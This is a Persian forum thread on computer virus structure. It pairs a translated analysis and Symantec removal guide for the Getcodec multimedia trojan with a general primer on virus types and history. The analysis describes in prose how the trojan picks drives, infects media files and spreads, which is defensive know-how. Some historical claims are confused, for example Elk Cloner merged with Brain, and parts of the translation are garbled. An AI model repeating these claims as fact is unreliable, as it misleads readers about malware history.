5-6-مسير مكانيسم جستجو و آلودگي
اين مسير قلب این malware است و پاسخگوي فعاليت بدخيمانه است قبل از همه اين تروجان PRIORITY_BELOW_NORMAL THREAD _ را براي تهديد خود تنظيم كرده و سپس مسير اصلي را شروع مي كند كه هدف آن جستجوي فايل هاي آلوده در درايو سخت قرباني است. چرا اين مسير بهتر است ؟فولدر CD Burning داراي فايل هايي است كه آماده برنامه نويسي روي CD/DVD هستند، از اين رو آلوده كردن اين فايل ها به اين malware امكان انتشار از طريق CD/DVD را مي دهد.
بنابراين اولين مسيري كه اين malware براي فايل هاي آسيب پذير بدنبال آن مي گردد، مسير زير است.
C:\Documents and settings\All users \Documents \My Music
اجازه دهيد دو فايل هدف را در اين فولدر قرار دهيم:

ما از دو فرمت فايل متفاوت براي كشف تفاوت ها در رفتار اين malware برپايه اين پارامتر استفاد كرديم.
5-7-جستجوي فايل
براي جستجوي فايل ها در آلوده كردن با اين malware توليد كننده از 2 AP1, ويندوز بخوبي شناخته شده استفاده كرده است Find Next FileW FindFirstFileW
اين نمونه سعي در آلوده كردن تمام فايل ها در درايو هايي دارد كه از نوع زير هستند:
:DRIVE_FIXED
مدياي ثابت شده ( مثل هارد درايوها يا فلش درايوها(
DRIVE-REMOTE:
درايو هاي شبكه دور دست
بنابراين در اين مورد تروجان هميشه سعي دريافتن فايل هاي مناسب براي آلوده كردن دارد، حتي اگر در فولدر تقسيم شده يا pendrive باشند. اين موضوع آن را مناسب تكثير و گسترش در محيط هاي مشترك و سازمان هايي مي كند كه استفاده وسيعي از موارد مشترك دارند مثل مدارس اقامتگاه ها و غيره.
5-8-آزمايش فايل هاي آلوده
آناليز مهندسي معکوس نشان داد كه اين نمونهURL And Exit Commands Enables را بهنگام اجرا غير فعال مي سازد از اين رو اگر بخواهيم فايل هاي جديدا آلوده شده را آزمايش كنيم بايد اين قابليت را راه بياندازيم. ( URL AND Exit Commands Enabled=1 )
سعي در اجراي فايل موسيقي روشن مي كند كه اين آلوده شده است.

اجراي يك فايل آلوده شده
بمحض اينكه فايل مولتي مدياي آلوده اجرا شد درخواست نصب يك رمز گذاري تقليدي نمايش داده مي شود اين رمزگذاری تقليدي نمونه malware ديگري است.
5-9- نتیجه گیری
همانطور كه مي بينيد، اين تكنولوژي ديگري است كه توسط توليد كنندگان اين malware براي فريب دادن كاربران در دانلود فايل هاي بدخيم استفاده شده است.اين روشي است كه براي ارائه هر نوع محتوا با تغيير ساده در URL براي دانلود رمز گشا استفاده شده است اين الگويي پاك و مرتب است چرا كه اين فايل براي ارائه به سادگي در كنار سرور تغيير يافته و با بهبود مجوزهاي صنعت آنتي ويروس بروز رساني را ممكن مي سازد.
بعلاوه توليد كننده اين نمونه خاص تصميم هوشمندانه اي در هدايت URL رمز گذار تقليدي به نقطه ديگري گرفته است كه فايل هاي بدخيم را براي ارائه ذخيره مي كند . در اين روش اگر اين سايت فايل را نگه دارد و خاموش شود وي به سادگي مسير را به سرور ديگري تغيير مي دهد.اين زمان ميانگين تخريب زير بناي تروجان را افزايش مي دهد كه احتمالا برگشت سرمايه را بهبود مي بخشد.
با دانستن طبيعت فايل هاي هدف، اين ابزار ايده آلي براي تكثير از طريق شبكه هاي P2P است. هر كاربر آلوده اي فايل هاي مولتي مدياي آلوده را از طريق كساني كه يا آنها ارتباط دارد بكار مي گيرد. احتمالا دوستاني كه در خواست فيلم، كليپ و غيره از كاربر آلوده مي كنند، مشكوك نمي شوند تا بررسي كند كه آيا فايل دانلود شده يك فايل مولتي مديا است و خود دامن به آلودگي مي زنند. سهم داران در شبكه و مشتركين در محيط هاي مشترك, مدارس,اقامتگاه ها و غيره نيز ابزار مناسبي براي تكثير هستند.
اين نمونه ديگري از چگونگي تركيب تكنيك و مهندسي اجتماعي در رسيدن به ميزان تكثير بالا است. در پايان هر چيزي كه كاربر مي آموزد وی رااز تهديدات جديد و اين حقيقت آگاه مي سازد كه فايل هاي مديا مي توانند طبيعت بدخيمي داشته باشند .
5-10-پاکسازی تروجان Getcodec Multimedia
کشف شده: 18جولای 2008
آپدیت شده: 19 جولای 2008
همچنین شناخته شده: W32/Getcodec-A
نوع: تروجان
سیستم های متاثر: Windows 2000 ، Windows 95 ، Windows 98 ، Windows Me ، Windows NT
WindowsVista,Windows Xp
دستور العمل های زیر برای همه فرآورده های آنتی ویروس سیمانتیک اعتبار دارد.
1- غیر فعال کنید System Restore را
2- آپدیت کنیدتعاریف ویروس را
3- اجرا کنید System Scam را به طور کامل
4- حذف کنید هر مقداری که به Registry اضافه شده است.
برای جزئیات خاص روی هر یک از این مراحل دستور العمل های زیر را بخوانید.
1- غیر فعال کردن سیستم Restore:
اگر شما Windows Me/xp را اجرا میکنید ما توصیه میکنیم که شما موقتا System Restore را خاموش کنید.
ویندوز Xp/Me برای بازگرداندن فایل ها روی کامپیوتر در موردی که آنها خراب می شوند از این مشخصه استفاده می کند که به وسیله یک Default توانا می شود.
اگر یک ویروس، کرم یا تروجان در کامپیوتر اثر کند System Restore ممکن است از ویروس ، کرم یا تروجان Backup بگیرد.
ویندوز از برنامه های خارجی که شامل برنامه های آنتی ویروس است جلو گیری می کند بنابراین برنامه آنتی ویروس یا ابزار ها نمی توانند تهدیدات را در پوشه System Restor حذف کنند.
در نتیجه System Restore پتانسیل بازگرداندن فایل آلوده را به کامپیوترتان دارد حتی بعد از اینکه شما فایل های آلوده را از همه محل های دیگر پاک کرده اید.
2- آپدیت کردن تعاریف ویروس:
Symantec Security Responseبه طور کامل همه تعاریف ویروس را برای اطمینان بالا تست می کند قبل از اینکه آنها به سرور ماپست شوند دو راه برای بدست آوردن تعاریف ویروس بیشتر وجود دارد.
-اجرا کردن Live Update که آسانترین راه برای بدست آوردن تعاریف ویروس است.
اگر شما از آنتی ویروس نور تون 2006 استفاده می کنید یا فرآورده جدیدتر، Live Update definition روزانه آپدیت می شود.
اگر شما از انتی ویروس 2005استفاده میکنید یا فراوردههای قدیمی ترLive Update definition هفتگی اپدیت میشود.
-دانلود کردن تعاریف با استفاده از Intelligent Updater: تعاریف ویروس در اینصورت روزانه پست می شود شما باید تعاریف راز سایت Security Response Symantec دانلود کنید و به صورت دستی آن ها را نصب کنید.
اجرا کردن Full system Scan:
a) برنامه آنتی ویروس سیمانتیک تان را شروع کنید ومطمئن شوید که آن برای Scan کردن همه فایل ها ترکیب بندی شده است.
b) اجرا کنید Full Sytem Scan
c) اگر فایلی نمایان شده است دستور العمل هایی که به وسیله برنامه آنتی ویروستان نمایش داده است را دنبال کنید بعد از اینکه فایل ها حذف شدند، کامپیوتر را در مدنرمال Restart کنید و با قسمت بعدی پیش بروید.
پیغام های اخطار هنگامیکه کامپیوتر Restart می شود ممکن است نمایش داده شوند زمانیکه تهدید به طور کامل حذف نشده باشد شما می توانید این پیغام هارا نادیده بگیرید و روی OK کلیک کنید پیغام نمایش داده شده ممکن است شبیه این باشد.
Title : [File path]
بدنه پیغام ویندوز نمی تواند [File name]را پیدا کند مطمئن شوید که شمانام را به درستی تایپ کرده ایدوآنگاه دوباره سعی کنید برای فایل جستجو کنید روی Start کلیک کنید و آنگاه روی Search کلیک کنید.
4- حذف کردن مقادیر از Regitry.:
Symantec قویا توصیه می کند که شما از ,Registry Backup بگیرد قبل از اینکه هر تغییری در آن بدهید. تغییرات نادرست در Registry منجر به از دست دادن دائمی دیتا یا فاسد شدن فایل ها می شود.
Subkey های مشخص شده را اصلاح کنید.
1- Click Start > Run
2- Type regedit
3- Cilck ok
4- Navigate to and delete the fallowing registry Subky:
Hkey – Current – user\ Software\ Microsoft \ Pimsrv
5- Restore the Follwing registry enteries to their previous Values.
Hkey_ Current_ user \ Software \ Microsoft \ Media player\ preferences “Urlandexit Commande Enabled”
Hkey_Current_User\Software\Microsoft\Mediaplayer \Player\Extensions\ mp3\ “permissions” =21
5- Exit Regtry Editor.


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:14 AM
ارسال: #26
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
يك ويروس، يك برنامه كامپيوتري است كه هنگام اجراي يك برنامه، به اجرا درمي‌آيد. بنابراين فقط فايل‌هاي اجرايي مي‌توانند آلوده شوند. اين فايل‌ها در MSDOS معمولاً داراي پسوند EXE،COM ، BAT و يا SYS هستند. بنا به تعريف، ويروس ساير برنامه‌ها را با نسخه‌هايي از خودش آلوده مي‌كند. ويروس توانايي تكثيرشدن دارد، پس در جستجوي مداوم براي محيط‌هاي ميزبان جديد براي توليد مثل مي‌باشد . بي‌خطرترين ويروس‌ها، فقط تكثير مي‌شوند و در سيستم‌هاي جديد گسترش مي‌يابند، اما برنامه ويروس ممكن است ساير برنامه‌ها را تخريب يا داده‌ها را مختل كند. شايد در اين ضمن خودش نيز تخريب شود. تنها شواهد چنين ويروس‌هايي، تخريبي است كه در سيستم‌هاي آلوده شده ايجاد مي‌كنند. اين امر ايجاد سد دفاعي در مقابل ويروس را بسيار مشكل مي‌كند.
ويروس‌ها مي‌توانند بلافاصله پس از ورود به يك دستگاه، مخرب شوند و يا مي‌توانند برنامه‌ريزي شوند تا زمان خاصي شروع به فعاليت كنند. نوع ديگري از ويروس منتظر است تا يك توالي خاص رايج از ضربات روي شاسي‌هاي صفحه كليد اجرا شود. از آن بدتر، حتي اگر بنظر برسد يك دستگاه آلوده، پاكسازي شده است، نوع بد خيمي از اين ويروس وجود دارد كه مي‌تواند مجدداً ظاهر شود و مشكلات تازه‌اي به وجود آورد.

مقدمه
برنامه‌هاي كامپيوتري شوخي‌آميز و گاهي مخربي كه ويروس خوانده مي‌شوند و به نظر مي‌رسد با سرعت الكترون‌هاي متحرك سير مي‌كنند، مانند يك بلاي غيرقابل كنترل در جامعه جهاني كامپيوتر انتشار يافته‌اند. برنامه‌هاي ويروس، كه براي دست انداختن ديگران يا خرابكاري عمدي نوشته مي‌شوند، با استفاده مشترك از نرم‌افزارهاي آلوده به ويروس توسط اپراتورهاي ناآگاه، به سرعت از كامپيوتري به كامپيوتر ديگر انتشار مي‌يابد.
در اوايل دهه 1980، اگر برنامه‌نويسي مي‌گفت كه كامپيوتر مي‌تواند به ًويروسً آلوده شود، احتمالاً با خنده تمسخرآميز همكارانش مواجه مي‌شد. طي اين مدت واكنش در مقابل اين مساله تا حدي تغير كرده است و اين امر تا حدودي به تبليغات گسترده، اما نه هميشه مبتني به واقعيتي كه به عمل آمده است، مربوط مي‌شود. اما حتي امروزه بسياري از كاربران داراي اين تصور غلط مي‌باشند كه ويروس‌هاي كامپيوتر ويروس‌هاي بيولوژيكي هستند.
البته چنين نيست. ويروس هاي كامپيوتر برنامه هستند، درست مانند برنامه‌هاي كاربربرگ يا وازه‌پرداز. به دليل اين تصور غلط از ويروس‌هاي كامپيوتري است كه طيف واكنش‌ها در قبال اين موضوع از خنده‌اي تمسخرآميز تا لبخندي از روي آگاهي گرفته تا هراس عمومي از آلودگي ويروسي متغير مي‌باشد. تا كنون توضيحات مبتني بر واقعيت در مورد اين موضوع عموماً ناديده گرفته شده‌اند، حال ممكن است از خود بپرسيد؛ "چگونه ممكن است برنامه‌اي در يك كامپيوتر مانند ويروس‌هاي طبيعي در داخل بدن يك جاندار عمل كند؟" براي اينكه بتوانيد به اين سؤال پاسخ دهيد بايد با ساختمان سيستم‌هاي كامپيوتري آشنا باشيد.

1- تعريف ويروس‌هاي كامپيوتري
به زبان ساده‌تر مي‌توان گفت ويروس، برنامه مخفي و كوچكي است كه باعث آلوده‌شدن برنامه ديگري مي‌شود و مي‌تواند داده‌ها را دستكاري يا تخريب نموده، سرعت سيستم را كاهش داده، باعث اغتشاش و عدم كارايي كامپيوتر شود.
مهمترين خصوصيت ويروس، قدرت تكثير آن است. ويروس‌ها براي تكثير نياز به يك برنامه اجرايي دارند، يعني بيشتر ويروس‌ها در فايل‌هاي اجرايي جاي مي‌گيرند و آنها را آلوده مي‌كنند و كمتر ويروسي پيدا مي‌شود كه در يك فايل غيراجرايي جاي بگيرد و بتواند از طريق آن تكثير شود. بنابراين، ويروس مي‌تواند هر برنامه سيستمي يا كاربردي باشد كه شرايط مورد نياز براي پذيرش ويروس را داشته باشد. برنامه آلوده نيز قادر است برنامه‌هاي ديگر را آلوده كند. از آنجايي‌كه ويروس‌ها مي‌توانند به تمامي فايل‌هايي كه توسط سيستم اجرا مي‌شوند، اضافه شوند، به آنها خود انعكاس مي‌گويند. با وجودي كه ويروس‌ها توسط برنامه‌نويسان مجرب و حرفه‌اي نوشته مي‌شوند، ولي برخي‌ها تصور مي‌كنند كه خود به خود و به‌طور تصادفي وارد سيستم مي‌شوند.

2- ويژگي‌هاي ويروس‌هاي كامپيوتري
هر برنامه‌اي كه داراي ويژگي‌هاي زير باشد، را ويروس كامپيوتري مي گوييم:
1. «تغييردادن نرم‌افزارهايي كه به برنامه ويروس متعلق نيستد، با چسباندن قسمت‌هايي از برنامه‌ي ويروس به اين برنامه‌هاي ديگر.
2. قابليت تشخيص اينكه يك برنامه قبلاً تغيير داده شده است يا خير؟
3. قابليت انجام تغيير در بعضي از برنامه‌ها.
4. قابليت جلوگيري از تغيير بيشتر يك برنامه، در صورتي كه معلوم شود قبلاً توسط ويروس تغيير داده شده است.
5. نرم‌افزارهايي تغيير داده شده، ويژگي‌هاي ا الي 4 را به خود مي‌گيرند.
اگر برنامه‌اي فاقد يك يا چند خاصيت از خواص فوق باشد، آنرا نمي‌توان به‌طور قطع ويروس تلقي كرد.»

3- نحوه فعاليت ويروس‌هاي كامپيوتري
ويروس‌ها همواره به دنبال برنامه‌اي براي آلوده كردن آن مي‌باشند. در صورت يافتن برنامه، ويروس بررسي مي‌كند كه آيا اين برنامه از قبل توسط ويروس آلوده شده است يا خير؟ اگر آلوده شده باشد، به جست‌وجو ادامه مي‌دهيم و اگر آلوده نباشد، يك نسخه از خود را به آن مي‌چسباند و آن را آلوده مي‌كند.
ويروس‌ها از طريق كدهايي كه در ابتداي برنامه‌ها قرار مي‌گيرند، مشخص مي‌كنند كه كدام برنامه آلوده است و يا كدام برنامه آلوده نيست. در واقع، ويروس‌ها در هر برنامه آلوده، امضايي دارند كه دو بار برنامه را امضاء نمي‌كنند.

4- ايجاد اولين ويروس
پيش از چند دهه قبل، مردي به نام «فرد كوهن» اولين ويروس كامپيوتري را به عنوان پروژه دانشجويي نوشت كه قادر بود خود را به صورت انگل‌وار تكثير كرده، به برنامه‌هاي ديگر بچسباند و تغييراتي را در آنها بوجود آورد. علت نامگذاري ويروس بر روي اين‌گونه برنامه‌ها، تشابه بسيار زياد آنها با ويروس‌هاي بيولوژيكي است، زيرا ويروس‌هاي كامپيوتري نيز مانند ويروس‌هاي بيولوژيكي به طور ناگهاني تكثير مي‌شوند، در حالي كه ممكن است بر روي يك ديسك وجود داشته باشند تا زماني كه شرايط مناسب نباشد، فعال نخواهند شد. اين ويروس در سال 1986 براي كامپيوترهاي مجهز به سيستم MS-DOS نوشته شد. مفهوم كلي ويروس كامپيوتري، احتمالاً از سال 1983 پديد آمد. در آن زمان، اين واژه، اولين بار توسط فرد كوهن مورد استفاده قرار گرفت كه در شركت Digital Equipment Corportion تجربياتي در اين زمينه انجام داده بود.
زمينه پيدايش اولين ويروس، كه بعدها گسترش فراواني پيدا كرد، از سال 82-1981 شروع شده بود، يعني ويروس ELK Cloner براي AppleII؛ اين ويروس كه Brain نام داشت در سال 1986 براي اولين بار كامپيوتر را آلوده كرد. اين ويروس كه از نوع ويروس‌هاي Boot-Sector و مقيم در حافظه (Memory-Resident) بود. داستان پيدايش اين ويروس بسيار عجيب است.
دو برادر پاكستاني به نام‌هاي باسط و امجد فروغ علوي، براي اينكه بتوانند در مقابل كپي‌برداري محافظت كنند، يك ويروس بي‌خطر را برنامه‌ريزي كردند ـ كه بعداً به نام Brain مشهور شدـ‌. اسم شركت كامپيوتري كوچك آنها، Brain computer services، به خاطر داشتن نشاني كامل و شماره تلفن آنها در درون اين ويروس، خيلي زود در تمام دنيا مشهور شد. اين دو برادر، به اثرات مخرب اين كار خود فكر نكرده بودند و نمي‌دانستند كه از برنامه‌نويسي آنها در آينده به عنوان ويروس‌هاي مخرب كامپيوتري استفاده مي‌شود. عملكرد اين ويروس از لحاظ فني واقعاً جالب بود: Brain روي Boot-Sector يك ديسكت نوشته مي‌شد و آن را به نسخه‌اي كه قبلاً ايجاد كرده بود، هدايت مي‌كرد. در اين حالت، اين ويروس به راحتي قابل كشف و بازيابي نبود. اين ويروس فقط برچسب (label) ديسكت را به C.Brain تغيير مي‌داد و به صورت دائم، در حافظه قرار مي‌گرفت تا بتوانند منتظر ديسكت‌هاي جديدي بماند كه هنوز به اين ويروس آلوده نشده بودند.
بعدها نسخه‌هاي ديگري از ويروس Brain ساخته شد كه فقط محدود به ديسكت‌ها نمي‌شدند، اهداف اين دو برنامه‌نويس پاكستاني به هيچ وجه مخرب و غيرانساني نبود، اين ويروس در آمريكا به عنوان حمله‌كننده‌اي به كامپيوترهاي آمريكايي ارزشيابي شد.

5- خصوصيات ويروس‌هاي كامپيوتري
1. ويروس‌ها معمولاً تغييرات مختلف در كامپيوتر را تشخيص داده و مي‌توانند در مقابل آنها عكس‌العمل نشان دهند.
2. به صورت خود كار و بدون دخالت اشخاص اجرا مي‌شوند.
3. معمولاًً مقيم در محافظت هستند و با اجراي فايل‌هاي آلوده به ويروس، در حافظه كپي مي‌شوند. ويروس‌هاي مقيم در حافظه مي‌توانند از طريق وقفه‌ها در حافظه مقيم شوند، يا اينكه به صورت مستقيم در حافظه مقيم شوند. روش دوم، نياز به مهارت فراوان در برنامه‌نويسي دارد، ولي در عوض ديرتر كشف مي‌شوند، زيرا اغلب برنامه‌هاي ضدويروس بر روي وقفه‌ها نظارت دارند.
4. نام ويروس‌ها در فهرست فايل‌ها ظاهر نمي‌شود.
5. ويروس‌ها مي‌توانند خود را در ساير كامپيوترها از طرق برنامه‌هاي آلوده، كپي كرده و توليد مثل نمايند.
6. ويروس‌ها كامپيوتري توسط برنامه‌نويسان تكامل پيدا مي‌كنند، يعني در حال حاضر، تكامل آنها وابسته به دخالت برنامه‌نويسان است.
7. اكثر ويروس‌هاي بوت سكتور كوچكتر از 512 بايت هستند، زيرا فضاي ذخيره شده در اين قسمت، 512 بايت (يك سكتور) است.
8. بعضي از ويروس‌ها، مانع از اجراي ضدويروس‌هايي مانند Scan مي‌شوند و اين در صورتي است كه حافظه آلوده به ويروس نباشد. در اين صورت، برنامه ضدويروس ظاهراً اجرا مي‌شود، ولي ويروس را نمي‌توان بر روي ديسكت تشخيص دهد. ويروس‌هاي «وان هاف» و «ايرانين» از اين نوع هستند.
9. ويروس‌هاي مقيم در حافظه، در صورت اجرا يا باز شدن فايل، آنها را آلوده مي‌سازند، ولي ويروس‌هايي كه در حافظه مقيم نيستند، بايد در فهرست جاري يا مسيرهاي تعريفي در Path به دنبال فايل‌هاي سالم بگردند و آنها را آلوده كنند. بعضي از ويروس‌ها به دنبال فايل‌هاي خاص در مسيرهاي خاص برمي‌گرداند و در صورت وجود فايل خاص، آن را آلوده مي‌كنند.
10. قسمت‌هاي مختلف يك ويروس، به هم وابسته‌اند و با پاك كردن يك يا همه دستورات، ويروس از بين مي‌رود.

6- شباهت‌هاي ويروس‌هاي كامپيوتري و بيولوژيكي
ويروس‌هاي بيولوژيكي ويروس‌هاي كامپيوتري
به سلول‌هاي خاصي از بدن حمله مي‌كنند. به برنامه‌هاي خاصي حمله مي‌كنند (تمام برنامه‌هاي *.com، برنامه‌هاي *.exe و ..).
اطلاعات ژنتيكي سلول را تغيير مي‌دهد. برنامه را تغيير مي‌دهد.
در خود سلول آلوده و ويروس‌هاي جديد را بوجود مي‌آورد. برنامه آلوده، برنامه‌هاي ويروس توليد مي‌كند.
يك سلول بيش از يك بار توسط يك ويروس آلوده نمي‌شود. اكثر ويروس‌ها هر برنامه را فقط يك بار آلوده مي‌كنند.
يك ارگانيسم آلوده ممكن است مدت‌ها هيچ گونه علامتي را بروز ندهند. برنامه آلوده ممكن است مدتها بدون خطا كار كند.
تمامي سلول‌هايي كه ويروس با آنها تماس مي‌يابد، آلوده نمي‌شوند. برنامه‌ها را مي‌توان در مقابل ويروس‌هاي خاصي مصون ساخت.
ويروس‌ها مي‌توانند تغيير شكل دهند و بنابراين نمي‌توان آنها را به وضوح تشخيص داد. برنامه‌هاي ويروس مي‌توانند خود را تغيير داده و احتمالاً به اين طريق مانع از كشف خود ‌شوند.

7- خطرات ناشي از ويروس‌ها
براي كاربران معمولي ممكن است حداكثر خطر ناشي از يك ويروس خطرناك، نابود شدن اطلاعات و برنامه‌هاي مهم موجود بر روي كامپيوترشان باشد، اما ضرر و زيان ناشي از ويروس‌هاي مخرب بر روي شبكه‌هاي ارتباطي مراكز تجاري و اقتصادي ممكن است موجب تغيير و يا حذف اطلاعات مالي و شركت‌ها و اشخاص گردد و خسارت مالي، اقتصادي و تجاري سنگين و جبران‌ناپذيري را در پي داشته باشد و يا حتي تاثير ويروس در سيستم‌هاي كامپيوتري يك پايگاه نظامي هسته‌اي ممكن است منجر به خطر افتادن حيات انسان‌ها و كره زمين گردد.
8. آشنايي با انواع مختلف ويروس
8- 1- ويروس‌هاي اينترنتي:
به احتمال بسيار، همگي افراد درباره ويروس Love كه به صورت پست الكترونيكي خود را براي كاربرهاي اينترنت ارسال مي‌كرد، چيزهايي شنيده‌اند. اين ويروس پس از مورد حمله قرار دادن يك كامپيوتر، با دستبرد به دفتر آدرس‌ها (Address book)در برنامه ارسال و دريافت پست الكترونيكي out look با استفاده از آدرس‌هاي فهرست شده در آن، خود را منتشر مي‌كرد. قبل از آن، همين روش توسط ويروس وحشتناك مليسا (Melissa) مورد استفاده قرار مي‌گيرند و تاكنون ويروس‌هاي كوچكتري نيز مانند Pretty park به اين شيوه خود را پراكنده‌اند. چنين به نظر مي‌رسد كه پست الكترونيكي به عنوان شيوه موثر ارتباط درد دنياي اينترنت، بهترين بسته براي انتشار بعضي از ويروس‌ها تبديل شده است.
در خبرها شنيده شده است كه نويسنده ويروس Love دستگير شده است، اما پس دستگيري اين شخص در اين مدت كوتاه با كمال تعجب شاهد انتشار ويروس ديگري هستيم كه طرز رفتاري بسيار شبيه پدرخوانده‌ي خود، يعني ويروس Love دارد. به گفته متخصصان مركز تحقيقات ويروس شناسي سينانتيك، اين ويروس حتي از ويروس Love مخرب‌تر است. اين ويروس كه به New Love شهرت يافته، در نخستين دو روز فعاليت خود، هزاران كامپيوتر را در سرتاسر جهان آلوده كرد. شناسايي اين ويروس از آنجا كه هر بار از طريق نامه‌اي به عنوان (Subject) متفاوت خود را ارسال مي‌كند، بسيار دشوارتر است، اما خوشبختانه مجموع خسارت آن به پاي ويروس Love نرسيده، چرا كه با آمادگي ذهني كه ويروس Love ايجاد كرده بود، بسياري از شركت‌هاي بزرگ چندمليتي در نخستين اقدام، توانستند از پذيرش برنامه‌هاي آلوده خودداري كنند.
اين ويروس مخرب، علاوه بر از بين بردن فايل‌هاي ذخيره شده در كامپيوتر، باعث از كار افتادن سيستم عامل كامپيوتر نيز مي‌شود. اين ويروس هرچند از نظر فني، پيچيده‌تر از ويروس Love است، اما فاقد هرگونه محرك است. ويروس Love از يك پيام تحريك‌آميز (I love you) در خط عنوان خود برخوردار است و يك پيام عاشقانه با نام (Love letter) به آن پيوسته است. اين ويروس حدود 10 بيليون دلار خسارت برجاي گذاشت، اما ويروس New Love فاقد چنين عبارت‌هايي است و هر بار با يك نام متفاوت خود را به نامه‌اي پيوست و ارسال مي‌كند.
8- 2- :Email viruse
ويروس‌هايي كه از طريق Email وارد سيستم مي‌شوند، معمولاً به صورت مخفيانه درون يك فايل ضميمه شده كه مي‌تواند در قالب يك صفحه با فرمت HTML و يا يك فايل قابل اجراي برنامه‌اي (يك فايل كد شده قابل اجرا) و يا يك Word document باشد كه با باز كردن آنها، فعال مي‌شوند. شما فقط با خواندن يك متن ساده پيغام، يك Email و يا استفاده از Net post ويروس دريافت نخواهيد كرد، بلكه چيزي كه بايد مراقب آن بود، پيغام‌هاي رمز شده حاوي كدهاي اجرايي و قرارداده شده در آنها و يا پيغامي كه حاوي فايل اجرايي ضميمه شده (يك فايل برنامه‌اي كد شده و يا يك Word document كه حاوي ماكروهايي باشد) است. از اين رو، براي به كار افتادن يك ويروس و يا يك برنامه اسب تروا، كامپيوتر مجبور است بعضي كدها را اجرا نمايد كه اين كد مي‌تواند يك برنامه ضميمه شده به يك Email و يا يك Word document دانلود شده از اينترنت و ... باشد.
8- 3- marco viruse
اين نوع ويروس‌ها معمولاً در داخل فايل‌هايي كه حاوي صفحات متني (Word document) نظير فايل‌هاي برنامه‌ي Office مانند Excel هستند، به شكل مايكرو قرار دارند.
توضيح مايكرو: نرم‌افزارهايي مانند Word, Excel، اين توانايي را به كاربر مي‌دهند كه در صفحه متن خود ماكرويي را ايجاد نموده كه اين ماكرو مي‌تواند حاوي يكسري دستورالعمل‌ها، عمليات و يا Key strake باشد كه تماماً ‌توسط خود كاربرد تعيين مي‌شوند. ماكرو ويروس‌ها، معمولاً طوري تنظيم شده‌اند كه خود را به راحتي در همه صفحات متني ساخته شده با همان نرم‌افزار (Word, Excel) جاي مي‌دهند.
8- 4- ويروسهاي بوت سكتور و پارتيشن
Boot sector بخشي از هر ديسك سخت و فلاپي ديسك است كه هنگامي كه سيستم از روي آنها راه‌اندازري مي‌شود، به وسيله كامپيوتر خوانده مي‌شود. Boot sector يك ديسك سيستم شامل كدي است كه براي باز كردن فايل‌هاي سيستم ضروري است. ديسك‌هايي كه شامل داده هستند و غيرمستقيم مي‌باشند، حاوي كدي هستند كه براي نمايش پيغامي مبني بر اينكه كامپيوتر نمي‌تواند به وسيله آنها راه‌اندازي شود، لازم است.
سكتور پارتيشن، اولين بخشي از يك ديسك سخت است كه بعد از راه‌اندازي سيستم خوانده مي‌شود. اين سكتور شامل اطلاعاتي درباره ديسك از قبيل تعداد سكتورها در هر پارتيشن و موقعيت همه‌ي پارتيشن‌ها مي‌باشد.
سكتور پارتيشن، همچنين ركورد اصلي راه‌اندازي يا Master Boot Record يا (MBR) نيز ناميده مي‌شود. بسياري از كامپيوترها طوري پيكربندي شده‌اند كه ابتدا از روي درايو A: راه‌اندازي مي‌شوند (اين قسمت توسط setup كامپيوتر قابل دسترسي و تنظيم است). اگر بوت سكتور يك فلاپي ديسك آلوده باشد، وقتي كه قصد داريد سيستم را از روي آن راه‌اندازي كنيد، ويروس نيز اجرا مي‌شود و ديسك سخت را آلوده مي‌كند.
اگر حتي ديسك شما حاوي فايل‌هاي سيستمي نباشد، ولي آلوده به يك ويروس بوت سكتوري باشد، اگر اشتباهاً ديسك را درون فلاپي درايو قرار دهيد و كامپيوتر را راه‌اندازي كنيد. پيغام زير در صفحه مشاهده مي‌شود، ولي ويروس بوت‌سكتوري پيش از اين اجرا شده و ممكن است كامپيوتر شما را نيز آلوده كرده باشد.
Non-system disk or error.
Replace and press any key where ready.
كامپيوتر بر پايه intel در برابر ويروس‌هاي table partition, boot sector آسيب‌پذير هستند. اين گونه ويروس‌ها، مي‌توانند هر كامپيوتري را صرف‌نظر از نوع سيستم عامل آن، تا وقتي كه ويروس قبل از بالا آمدن سيستم اجرا گردد، آلوده كنند.

8- 5- Hoax :
اين نوع ويروس امروزه بازار داغي دارند. پيغام‌هاي فريب‌آميزي كه كاربران اينترنت را گول زده و به كام خود مي‌كشد، به ويژه وقتي كه كاربر بيچاره كمي هم‌احساسي باشد. اين نوع ويروس‌ها معمولاً به همراه يك نامه ضميمه شده از طريق پست الكترونيكي وارد سيستم مي‌شوند. متن نامه معمولاً متن مشخص نمي‌باشد و تا حدودي بستگي به روحيات شخصي نويسنده ويروس دارد. گاهي ممكن است تهديدآميز و يا بالعكس، محبت‌آميز و يا مي‌تواند هشداري مبني بر شيوع يك ويروس جديد در اينترنت و يا درخواستي در مقابل يك مبلغ قابل توجه و يا هر چيز ديگري كه انسان را وسوسه كرده تا دست به عملي بزند، را شامل مي‌شود. البته ناگفته نماند كه همه اين نامه‌ها اصلي نمي‌باشد، يعني ممكن است پيغام شخصي سازنده ويروس نباشد،‌ بلكه يك پيغام ويرايش شده و يا به‌طور كلي تغيير داده شده توسط يك كاربر معمولي و يا شخص ديگري باشد، كه قبلاً اين نامه‌ها را دريافت كرده و بدينوسيله ويروس را با پيغامي كاملاً جديد مجدداً ارسال مي‌كند. نحوه تغيير پيغام و ارسال مجدد آن بسيار ساده است و همين امر باعث گسترش سريع HoAxها شده، با يك دستور Forward مي‌توان ويروس و متن تغيير داده شده را براي شخص ديگري ارسال كرد.

8- 6- ويروسهاي چند جزئي multi partite viruse
بعضي از ويروس‌ها، تركيبي از تكنيك‌ها را براي انتشار استفاده مي‌كنند و فايل اجرايي، بوت سكتور و پارتيشن را آلوده مي‌كنند. اين گونه ويروس‌ها معمولاً تحت Win98, WinNT انتشار نمي‌يابند.
